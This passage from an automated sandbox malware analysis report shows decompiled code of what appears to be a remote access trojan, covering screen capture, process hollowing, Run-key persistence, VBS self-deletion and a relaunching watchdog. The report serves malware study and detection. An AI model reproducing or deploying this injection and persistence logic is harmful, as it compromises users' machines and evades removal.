                    												_v246 = 0;
                    												_v242 = _t225->bmiHeader + _t225->bmiHeader.biClrUsed * 4 + 0xe;
                    												E004020BF(_t185,  &_v236);
                    												E004020BF(_t185,  &_v148);
                    												E004024EA(_t185,  &_v236, 1, __eflags,  &_v252, 0xe);
                    												L00403356( &_v244);
                    												E004024EA(_t185,  &_v248, 1, __eflags, _t225, 0x28);
                    												L00403356( &_v256);
                    												_t226 = _v296;
                    												E004024EA(_t185,  &_v260, 1, __eflags, _t226, _t225->bmiHeader.biSizeImage);
                    												L00403356( &_v268);
                    												DeleteObject(_t219);
                    												GlobalFree(_t226);
                    												DeleteDC(_v308);
                    												__eflags = _t234 -  *0x4726ac;
                    												if(__eflags != 0) {
                    													DeleteDC(_t234);
                    												}
                    												E00402035(_t185, _t185, _t234, __eflags,  &_v156);
                    												E00401FB8();
                    												E00401FB8();
                    												L9:
                    												return _t185;
                    											}
                    											DeleteDC(_v268);
                    											DeleteDC(_t234);
                    											DeleteObject(_t219);
                    											GlobalFree(_v284);
                    										} else {
                    											DeleteDC(_v240);
                    											L12:
                    											DeleteDC(_t234);
                    											DeleteObject(_t219);
                    											L7:
                    										}
                    										goto L8;
                    									}
                    									_push(8);
                    									_pop(1);
                    									_v252 = 1;
                    									__eflags = _t122 - 1;
                    									if(_t122 <= 1) {
                    										goto L28;
                    									}
                    									_push(0x10);
                    									_pop(1);
                    									_v252 = 1;
                    									__eflags = _t122 - 1;
                    									if(_t122 <= 1) {
                    										goto L28;
                    									}
                    									_t214 = 0x18;
                    									__eflags = _t122 - _t214;
                    									if(_t122 > _t214) {
                    										_push(0x20);
                    										_pop(1);
                    										L27:
                    										_v252 = 1;
                    										goto L28;
                    									}
                    									_v252 = _t214;
                    									_push(0x28);
                    									goto L29;
                    								}
                    								goto L27;
                    							}
                    						}
                    						L11:
                    						DeleteDC(_t223);
                    						goto L12;
                    					}
                    					DeleteDC(_t223);
                    					DeleteDC(_t234);
                    					DeleteObject(_t219);
                    					goto L7;
                    				}
                    			}

                    APIs
                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417A3D
                    • CreateCompatibleDC.GDI32(00000000), ref: 00417A4A
                      • Part of subcall function 00417E84: EnumDisplaySettingsW.USER32 ref: 00417EB4
                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00417AC0
                    • DeleteDC.GDI32(00000000), ref: 00417AD7
                    • DeleteDC.GDI32(00000000), ref: 00417ADA
                    • DeleteObject.GDI32(00000000), ref: 00417ADD
                    • SelectObject.GDI32(00000000,00000000), ref: 00417AFE
                    • DeleteDC.GDI32(00000000), ref: 00417B0F
                    • DeleteDC.GDI32(00000000), ref: 00417B12
                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00417B36
                    • GetIconInfo.USER32(?,?), ref: 00417B6A
                    • DeleteObject.GDI32(?), ref: 00417B99
                    • DeleteObject.GDI32(?), ref: 00417BA6
                    • DrawIcon.USER32 ref: 00417BB3
                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00417BCB
                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417C3A
                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00417CA9
                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417CCD
                    • DeleteDC.GDI32(?), ref: 00417CE1
                    • DeleteDC.GDI32(00000000), ref: 00417CE4
                    • DeleteObject.GDI32(00000000), ref: 00417CE7
                    • GlobalFree.KERNEL32 ref: 00417CF2
                    • DeleteObject.GDI32(00000000), ref: 00417DA6
                    • GlobalFree.KERNEL32 ref: 00417DAD
                    • DeleteDC.GDI32(?), ref: 00417DBD
                    • DeleteDC.GDI32(00000000), ref: 00417DC8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                    • String ID: DISPLAY
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 57%
                    			E00416FDD(intOrPtr __ecx, void __edx) {
                    				void* __edi;
                    				_Unknown_base(*)()* _t81;
                    				int _t87;
                    				signed int _t110;
                    				int _t117;
                    				intOrPtr _t119;
                    				int _t122;
                    				long _t123;
                    				int _t128;
                    				void _t141;
                    				void* _t145;
                    				intOrPtr _t146;
                    				intOrPtr _t148;
                    				intOrPtr _t154;
                    				struct _PROCESS_INFORMATION* _t157;
                    				void _t158;
                    				intOrPtr _t160;
                    				intOrPtr* _t162;
                    				intOrPtr* _t164;
                    				int _t166;
                    				void* _t167;
                    				void* _t168;
                    
                    				_t164 = __edx;
                    				_t157 =  *(_t167 + 0x94);
                    				 *(_t167 + 0x34) = __edx;
                    				 *((intOrPtr*)(_t167 + 0x30)) = __ecx;
                    				 *((intOrPtr*)(_t167 + 0x1c)) = 0;
                    				while(1) {
                    					 *(_t167 + 0x34) = 0;
                    					 *(_t167 + 0x18) = 0;
                    					 *((intOrPtr*)(_t167 + 0x1c)) = 0;
                    					 *((intOrPtr*)(_t167 + 0x20)) = 0;
                    					 *0x470d90 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwCreateSection");
                    					 *0x470d84 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwMapViewOfSection");
                    					 *0x470d88 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwUnmapViewOfSection");
                    					_t81 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwClose");
                    					 *0x470d8c = _t81;
                    					if( *0x470d84 == 0 ||  *0x470d88 == 0 ||  *0x470d90 == 0 || _t81 == 0) {
                    						break;
                    					}
                    					_t160 = 0x44;
                    					E00435760(_t157, _t167 + 0x4c, 0, _t160);
                    					_t168 = _t167 + 0xc;
                    					 *((intOrPtr*)(_t168 + 0x48)) = _t160;
                    					E00435760(_t157, _t157, 0, 0x10);
                    					_t167 = _t168 + 0xc;
                    					if( *_t164 != 0x5a4d) {
                    						break;
                    					}
                    					_t162 =  *((intOrPtr*)(_t164 + 0x3c)) + _t164;
                    					if( *_t162 != 0x4550) {
                    						break;
                    					}
                    					_t87 =  *(_t162 + 0x50);
                    					 *(_t167 + 0x24) = _t87;
                    					 *(_t167 + 0x44) = _t87;
                    					 *((intOrPtr*)(_t167 + 0x48)) = 0;
                    					 *((intOrPtr*)(_t167 + 0x2c)) =  *((intOrPtr*)(_t162 + 0x34));
                    					if(CreateProcessW(0,  *(_t167 + 0x50), 0, 0, 0, 4, 0, 0, _t167 + 0x4c, _t157) == 0) {
                    						GetLastError();
                    						break;
                    					}
                    					_t145 = VirtualAlloc(0, 4, 0x1000, 4);
                    					 *(_t167 + 0x3c) = _t145;
                    					 *_t145 = 0x10007;
                    					if(GetThreadContext(_t157->hThread, _t145) == 0 || ReadProcessMemory(_t157->hProcess,  *((intOrPtr*)(_t145 + 0xa4)) + 8, _t167 + 0x34, 4, _t167 + 0x3c) == 0) {
                    						L32:
                    						VirtualFree(_t145, 0, 0x8000);
                    						 *0x470d88(GetCurrentProcess(), _t167 + 0x14);
                    						 *0x470d8c( *(_t167 + 0x18));
                    						TerminateProcess(_t157->hProcess, 0);
                    						break;
                    					} else {
                    						_push(0);
                    						_push(0x8000000);
                    						_push(0x40);
                    						_push(_t167 + 0x4c);
                    						_push(0);
                    						_push(0xf001f);
                    						_push(_t167 + 0x30);
                    						if( *0x470d90() != 0) {
                    							goto L32;
                    						}
                    						_t110 =  !( *(_t162 + 0x16) & 0x0000ffff) & 0x00000001;
                    						 *(_t167 + 0x24) = _t110;
                    						if(_t110 == 0) {
                    							_t141 =  *(_t167 + 0x28);
                    							 *(_t167 + 0x18) = _t141;
                    							 *0x470d88(_t157->hProcess, _t141);
                    						}
                    						_push(0x40);
                    						_push(0);
                    						_push(1);
                    						_push(_t167 + 0x24);
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(_t167 + 0x2c);
                    						_push(_t157->hProcess);
                    						_push( *(_t167 + 0x3c));
                    						if( *0x470d84() == 0) {
                    							_t117 =  *0x470d84( *(_t167 + 0x3c), GetCurrentProcess(), _t167 + 0x30, 0, 0, 0, _t167 + 0x24, 1, 0, 0x40);
                    							__eflags = _t117;
                    							if(_t117 != 0) {
                    								goto L32;
                    							}
                    							__eflags =  *(_t167 + 0x24) - _t117;
                    							if( *(_t167 + 0x24) != _t117) {
                    								 *((intOrPtr*)(_t162 + 0x34)) =  *((intOrPtr*)(_t167 + 0x10));
                    							}
                    							E004351E0( *((intOrPtr*)(_t167 + 0x1c)), _t164,  *((intOrPtr*)(_t162 + 0x54)));
                    							 *(_t167 + 0x3c) =  *(_t167 + 0x3c) & 0x00000000;
                    							_t119 =  *((intOrPtr*)(_t164 + 0x3c));
                    							_t167 = _t167 + 0xc;
                    							__eflags = 0 -  *(_t162 + 6);
                    							if(0 >=  *(_t162 + 6)) {
                    								L23:
                    								__eflags =  *(_t167 + 0x24);
                    								_t154 =  *((intOrPtr*)(_t167 + 0x10));
                    								if( *(_t167 + 0x24) != 0) {
                    									_t129 =  *(_t167 + 0x28);
                    									__eflags =  *(_t167 + 0x28) - _t154;
                    									if(__eflags != 0) {
                    										E004173F1( *((intOrPtr*)(_t167 + 0x1c)), __eflags, _t129, 0, _t154, 0);
                    										_t154 =  *((intOrPtr*)(_t167 + 0x20));
                    										_t167 = _t167 + 0x10;
                    									}
                    								}
                    								__eflags =  *((intOrPtr*)(_t167 + 0x2c)) - _t154;
                    								if( *((intOrPtr*)(_t167 + 0x2c)) == _t154) {
                    									L29:
                    									 *((intOrPtr*)(_t145 + 0xb0)) =  *((intOrPtr*)(_t162 + 0x28)) + _t154;
                    									_t122 = SetThreadContext(_t157->hThread, _t145);
                    									__eflags = _t122;
                    									if(_t122 == 0) {
                    										goto L32;
                    									}
                    									_t123 = ResumeThread(_t157->hThread);
                    									__eflags = _t123 - 0xffffffff;
                    									if(_t123 == 0xffffffff) {
                    										goto L32;
                    									}
                    									return 1;
                    								} else {
                    									_t128 = WriteProcessMemory(_t157->hProcess,  *((intOrPtr*)(_t145 + 0xa4)) + 8, _t167 + 0x18, 4, 0);
                    									__eflags = _t128;
                    									if(_t128 == 0) {
                    										goto L32;
                    									}
                    									_t154 =  *((intOrPtr*)(_t167 + 0x10));
                    									goto L29;
                    								}
                    							} else {
                    								_t158 =  *(_t167 + 0x34);
                    								_t146 =  *((intOrPtr*)(_t167 + 0x30));
                    								_t166 = _t164 + 0x10c + _t119;
                    								__eflags = _t166;
                    								do {
                    									E004351E0( *((intOrPtr*)(_t166 - 8)) +  *((intOrPtr*)(_t167 + 0x1c)),  *_t166 + _t158,  *((intOrPtr*)(_t166 - 4)));
                    									_t166 = _t166 + 0x28;
                    									_t167 = _t167 + 0xc;
                    									_t146 = _t146 + 1;
                    									__eflags = _t146 - ( *(_t162 + 6) & 0x0000ffff);
                    								} while (_t146 < ( *(_t162 + 6) & 0x0000ffff));
                    								_t157 =  *(_t167 + 0x94);
                    								_t145 =  *(_t167 + 0x38);
                    								goto L23;
                    							}
                    						} else {
                    							VirtualFree(_t145, 0, 0x8000);
                    							 *0x470d8c( *(_t167 + 0x18));
                    							TerminateProcess( *_t157, 0);
                    							_t148 =  *((intOrPtr*)(_t167 + 0x1c)) + 1;
                    							_push(0);
                    							 *((intOrPtr*)(_t167 + 0x20)) = _t148;
                    							_pop(0);
                    							if(_t148 <= 0x64) {
                    								continue;
                    							}
                    							break;
                    						}
                    					}
                    				}
                    				return 0;
                    			}

                    APIs
                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00417024
                    • GetProcAddress.KERNEL32(00000000), ref: 00417027
                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00417038
                    • GetProcAddress.KERNEL32(00000000), ref: 0041703B
                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041704C
                    • GetProcAddress.KERNEL32(00000000), ref: 0041704F
                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00417060
                    • GetProcAddress.KERNEL32(00000000), ref: 00417063
                    • CreateProcessW.KERNEL32 ref: 00417105
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041711D
                    • GetThreadContext.KERNEL32(?,00000000), ref: 00417133
                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00417159
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004171DB
                    • TerminateProcess.KERNEL32(?,00000000), ref: 004171EF
                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041722F
                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 004172F9
                    • SetThreadContext.KERNEL32(?,00000000), ref: 00417316
                    • ResumeThread.KERNEL32(?), ref: 00417323
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041733A
                    • GetCurrentProcess.KERNEL32(?), ref: 00417345
                    • TerminateProcess.KERNEL32(?,00000000), ref: 00417360
                    • GetLastError.KERNEL32 ref: 00417368
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E0040C5A4() {
                    				short _v524;
                    				char _v548;
                    				char _v572;
                    				char _v576;
                    				char _v596;
                    				char _v600;
                    				void* _v604;
                    				char _v620;
                    				char _v624;
                    				void* _v628;
                    				char _v644;
                    				char _v648;
                    				char _v652;
                    				char _v668;
                    				char _v672;
                    				void* _v676;
                    				void* _t49;
                    				void* _t50;
                    				void* _t53;
                    				void* _t56;
                    				void* _t71;
                    				void* _t82;
                    				void* _t84;
                    				void* _t85;
                    				signed char _t123;
                    				signed char _t124;
                    				void* _t195;
                    				void* _t228;
                    				void* _t230;
                    				void* _t231;
                    				void* _t232;
                    
                    				E00411D93();
                    				if( *0x46f9d4 != 0x30) {
                    					E0040AE1C();
                    				}
                    				_t228 =  *0x470d63 - 1; // 0x0
                    				if(_t228 == 0) {
                    					E004185EF(_t195, _t228);
                    				}
                    				if( *0x470a85 != 0) {
                    					E0041AC0A(E00401EE4(0x472d40), _t195);
                    				}
                    				_t213 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                    				_t230 =  *0x470b33 - 1; // 0x1
                    				if(_t230 == 0) {
                    					E00412D0B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EE4(0x473208));
                    				}
                    				_t231 =  *0x470b30 - 1; // 0x1
                    				if(_t231 == 0) {
                    					E00412D0B(0x80000002, _t213, E00401EE4(0x473208));
                    				}
                    				_t232 =  *0x470b31 - 1; // 0x0
                    				if(_t232 == 0) {
                    					E00412D0B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EE4(0x473208));
                    				}
                    				E00435760(0,  &_v524, 0, 0x208);
                    				_t49 = E0040245C();
                    				_t50 = E00401F8B(0x473280);
                    				_t53 = E004129E0(E00401F8B(0x473238), "exepath",  &_v524, 0x208, _t50, _t49);
                    				_t233 = _t53;
                    				if(_t53 == 0) {
                    					GetModuleFileNameW(0,  &_v524, 0x208);
                    				}
                    				RegDeleteKeyA(0x80000001, E00401F8B(0x473238));
                    				_t56 = E00406E2B(_t233);
                    				_t234 = _t56;
                    				if(_t56 != 0) {
                    					SetFileAttributesW(E00401EE4(0x473250), 0x80);
                    				}
                    				_t123 =  ~(SetFileAttributesW( &_v524, 0x80));
                    				asm("sbb bl, bl");
                    				E00402FF4(_t123,  &_v548, E0041A7B9( &_v620, E0041A4D3( &_v668)), 0, 0x46a8f0, _t234, L".vbs");
                    				E00401EE9();
                    				E00401FB8();
                    				E004042FD(_t123,  &_v576, E00402FF4(_t123,  &_v672, E0040415E(_t123,  &_v620, _t60, 0x46a8f0, E0043A99F(_t123,  &_v668, _t234, L"Temp")), 0, 0x46a8f0, _t234, "\\"), 0x46a8f0, _t234,  &_v548);
                    				E00401EE9();
                    				E00401EE9();
                    				_t71 = E0040415E(_t123,  &_v672, _t67, 0x46a8f0, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                    				_t202 = L"On Error Resume Next\n";
                    				E004042DC(_t123,  &_v652, L"On Error Resume Next\n", 0x46a8f0, _t234, _t71);
                    				E00401EE9();
                    				_t124 = _t123 & 0x00000001;
                    				_t235 = _t124;
                    				if(_t124 != 0) {
                    					_t202 = E004042DC(_t124,  &_v624, L"while fso.FileExists(\"", 0x46a8f0, _t235, E0040415E(_t124,  &_v596, L"On Error Resume Next\n", 0x46a8f0,  &_v524));
                    					E0040323D(E00402FF4(_t124,  &_v672, _t98, 0, 0x46a8f0, _t235, L"\")\n"));
                    					E00401EE9();
                    					E00401EE9();
                    					E00401EE9();
                    				}
                    				E0040323D(E00402FF4(_t124,  &_v600, E00402FF4(_t124,  &_v672, E0040415E(_t124,  &_v620, _t202, 0x46a8f0, L"fso.DeleteFile \""), 0, 0x46a8f0, _t235,  &_v524), 0, 0x46a8f0, _t235, L"\"\n"));
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				_t236 = _t124;
                    				if(_t124 != 0) {
                    					L004086C6(_t124,  &_v644, 0, 0x46a8f0, L"wend\n");
                    				}
                    				_t82 = E00406E2B(_t236);
                    				_t237 = _t82;
                    				if(_t82 != 0) {
                    					_t36 =  &_v668; // 0x473250
                    					E0040323D(E00402FF4(_t124,  &_v596, E0040AEF6(_t36, L"fso.DeleteFolder \"", 0x46a8f0, 0x473250), 0, 0x46a8f0, _t237, L"\"\n"));
                    					E00401EE9();
                    					E00401EE9();
                    				}
                    				L004086C6(_t124,  &_v644, 0, 0x46a8f0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                    				_t84 = E00401EE4( &_v576);
                    				_t85 = E0040245C();
                    				E00401EE4( &_v648);
                    				if(E0041AD6A(_t85 + _t85, _t84, 0) != 0) {
                    					ShellExecuteW(0, L"open", E00401EE4( &_v572), 0x46a8f0, 0x46a8f0, 0);
                    				}
                    				ExitProcess(0);
                    			}

                    APIs
                      • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                      • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C6AE
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C6C1
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C6F1
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C700
                      • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                      • Part of subcall function 0040AE1C: UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                      • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                      • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040C91B
                    • ExitProcess.KERNEL32 ref: 0040C922
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: ")$.vbs$82G$@-G$On Error Resume Next$P2G$P2G$P2G(PF$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                    • API String ID: 3797177996-790292332
                    • Opcode ID: af05c1e3c5dc9ddb826154d330f7d895edef774a658f9b1daa80bde45ae6ee5b
                    • Instruction ID: 6e45ccf0452d088d16b27cf02e05fcd52a39cd31be9773de80b43fbe075aaa7b
                    • Opcode Fuzzy Hash: af05c1e3c5dc9ddb826154d330f7d895edef774a658f9b1daa80bde45ae6ee5b
                    • Instruction Fuzzy Hash: F7817F716043405BC718FB62D8929AF73E9AF90308F10493FB546A71E2EE7C9D49C69E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E004119B8() {
                    				long _v8;
                    				char _v32;
                    				short _v556;
                    				short _v1076;
                    				short _v1596;
                    				CHAR* _t24;
                    				void* _t26;
                    				void* _t27;
                    				void* _t30;
                    				int _t32;
                    				long _t38;
                    				int _t40;
                    				int _t42;
                    				long _t51;
                    				int _t53;
                    				void* _t56;
                    				int _t58;
                    				void* _t69;
                    				int _t71;
                    				int _t72;
                    				int _t73;
                    				long _t74;
                    				void* _t112;
                    				void* _t114;
                    				void* _t116;
                    				void* _t119;
                    
                    				_v8 = _t74;
                    				_t24 = E00401F8B(0x473370);
                    				_t72 = 0;
                    				if(CreateMutexA(0, 1, _t24) != 0) {
                    					_t26 = E0040245C();
                    					_t27 = E00401F8B(0x473280);
                    					_t30 = E004129E0(E00401F8B(0x473238), "exepath",  &_v556, 0x208, _t27, _t26);
                    					_t119 = _t119 + 0x14;
                    					if(_t30 != 0) {
                    						E004020BF(0,  &_v32);
                    						_t32 = E0041ADFE( &_v32);
                    						_push(0);
                    						__eflags = _t32;
                    						if(_t32 == 0) {
                    							L2:
                    							ExitProcess();
                    						}
                    						CreateFileW( &_v556, 0x80000000, 1, 0, 3, 0x80, ??);
                    						_t114 = OpenProcess(0x100000, 0, _v8);
                    						WaitForSingleObject(_t114, 0xffffffff);
                    						CloseHandle(_t114);
                    						_t38 = GetCurrentProcessId();
                    						_t40 = E00412B5F(0x473238, E00401F8B(0x473238), "WDH", _t38);
                    						__eflags = _t40;
                    						if(_t40 == 0) {
                    							goto L1;
                    						}
                    						_t112 = ShellExecuteW;
                    						do {
                    							_t42 = PathFileExistsW( &_v556);
                    							__eflags = _t42;
                    							_t43 =  &_v556;
                    							if(_t42 != 0) {
                    								L13:
                    								ShellExecuteW(_t72, L"open", _t43, _t72, _t72, 1);
                    								L14:
                    								do {
                    									_t73 = E00412831(E00401F8B(0x473238), "WD",  &_v8);
                    									__eflags = _t73;
                    									if(_t73 == 0) {
                    										Sleep(0x1f4);
                    									} else {
                    										E00412C91(E00401F8B(0x473238), __eflags, "WD");
                    									}
                    									__eflags = _t73;
                    								} while (_t73 == 0);
                    								goto L19;
                    							}
                    							_t56 = E0040245C();
                    							E00401F8B( &_v32);
                    							_t58 = E0041AD6A(_t56,  &_v556, _t72);
                    							__eflags = _t58;
                    							if(_t58 == 0) {
                    								E00435760(_t112,  &_v1596, _t72, 0x208);
                    								_t119 = _t119 + 0xc;
                    								GetTempPathW(0x104,  &_v1596);
                    								GetTempFileNameW( &_v1596, L"temp_", _t72,  &_v1076);
                    								lstrcatW( &_v1076, L".exe");
                    								_t69 = E0040245C();
                    								E00401F8B( &_v32);
                    								_t71 = E0041AD6A(_t69,  &_v1076, _t72);
                    								__eflags = _t71;
                    								if(_t71 == 0) {
                    									goto L14;
                    								}
                    								_t43 =  &_v1076;
                    								goto L13;
                    							}
                    							_t43 =  &_v556;
                    							goto L13;
                    							L19:
                    							_t72 = 0;
                    							_t116 = OpenProcess(0x100000, 0, _v8);
                    							WaitForSingleObject(_t116, 0xffffffff);
                    							CloseHandle(_t116);
                    							_t51 = GetCurrentProcessId();
                    							_t53 = E00412B5F(0x473238, E00401F8B(0x473238), "WDH", _t51);
                    							__eflags = _t53;
                    						} while (_t53 != 0);
                    						goto L1;
                    					}
                    					_push(0);
                    					goto L2;
                    				}
                    				L1:
                    				_push(1);
                    				goto L2;
                    			}

                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,00473298,00000003), ref: 004119D7
                    • ExitProcess.KERNEL32(00000000), ref: 004119E3
                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00411A5D
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00411A6C
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411A77
                    • CloseHandle.KERNEL32(00000000), ref: 00411A7E
                    • GetCurrentProcessId.KERNEL32 ref: 00411A84
                    • PathFileExistsW.SHLWAPI(?), ref: 00411AB5
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00411B18
                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411B32
                    • lstrcatW.KERNEL32(?,.exe), ref: 00411B44
                      • Part of subcall function 0041AD6A: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041AE89,00000000,00000000,?), ref: 0041ADA9
                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411B84
                    • Sleep.KERNEL32(000001F4), ref: 00411BC5
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00411BDA
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411BE5
                    • CloseHandle.KERNEL32(00000000), ref: 00411BEC
                    • GetCurrentProcessId.KERNEL32 ref: 00411BF2
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                    • String ID: .exe$82G$82G$82G$WDH$exepath$open$p3G$temp_
                    • API String ID: 2649220323-3724276308
                    • Opcode ID: 7caec265afb69ecb8da572177a1ba02d05a1ee303e11ed8225a2b8a80e2b0253
                    • Instruction ID: 22e993795ca5e5f4b94ea2bece14d6f4ece3e8e9738639780bf53f9b9ba412ff
                    • Opcode Fuzzy Hash: 7caec265afb69ecb8da572177a1ba02d05a1ee303e11ed8225a2b8a80e2b0253
                    • Instruction Fuzzy Hash: D251F871A043157BDB10A7A0AC99EEF336C9B04715F1001BBF905A72D2EF789E858A5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0040C307(char __ecx, void* __edx, void* __eflags, WCHAR* _a4, char _a8, char _a12) {
                    				char _v24;
                    				char _v28;
                    				void* _v32;
                    				char _v48;
                    				char _v49;
                    				char _v52;
                    				void* _v56;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t22;
                    				void* _t23;
                    				WCHAR* _t28;
                    				int _t29;
                    				void* _t35;
                    				WCHAR* _t43;
                    				int _t45;
                    				int _t48;
                    				WCHAR* _t54;
                    				int _t55;
                    				void* _t70;
                    				void* _t130;
                    				void* _t131;
                    				void* _t135;
                    
                    				_t135 =  &_v56;
                    				_t130 = __edx;
                    				_v49 = __ecx;
                    				_t22 = E0043A3D6(__edx);
                    				_t139 = _t22;
                    				if(_t22 == 0) {
                    					_t73 = _a4;
                    					_t125 = _v49;
                    					_t23 = E0040CF38( &_v24, _v49, _a4);
                    					_t131 = 0x473220;
                    					E00401EF3(0x473220, _v49, 0x473220, _t23);
                    				} else {
                    					CreateDirectoryW(E00401EE4(0x473250), 0);
                    					_t73 = _a4;
                    					_t125 = E004087F0( &_v24, 0x473250, 0x473250, "\\");
                    					_t70 = E00402FF4(_a4,  &_v48, _t69, _t130, 0x473250, _t139, _t73);
                    					_t131 = 0x473220;
                    					E00401EF3(0x473220, _t69, 0x473220, _t70);
                    					E00401EE9();
                    				}
                    				E00401EE9();
                    				if(E0043E224(E00401EE4(_t131), 0x470b38, _t26) != 0) {
                    					_t28 = E00401EE4(_t131);
                    					_t134 = CopyFileW;
                    					_t29 = CopyFileW(0x470b38, _t28, 0);
                    					__eflags = _t29;
                    					if(_t29 != 0) {
                    						L14:
                    						_push(E00401EE4(0x473208));
                    						E0040C21B(0x473208);
                    						__eflags = _a8 - 1;
                    						if(_a8 == 1) {
                    							_t43 = E00401EE4(_t131);
                    							_t73 = SetFileAttributesW;
                    							SetFileAttributesW(_t43, 7);
                    							_t45 = E0043A3D6(_t130);
                    							__eflags = _t45;
                    							if(_t45 != 0) {
                    								SetFileAttributesW(E00401EE4(0x473250), 7);
                    							}
                    						}
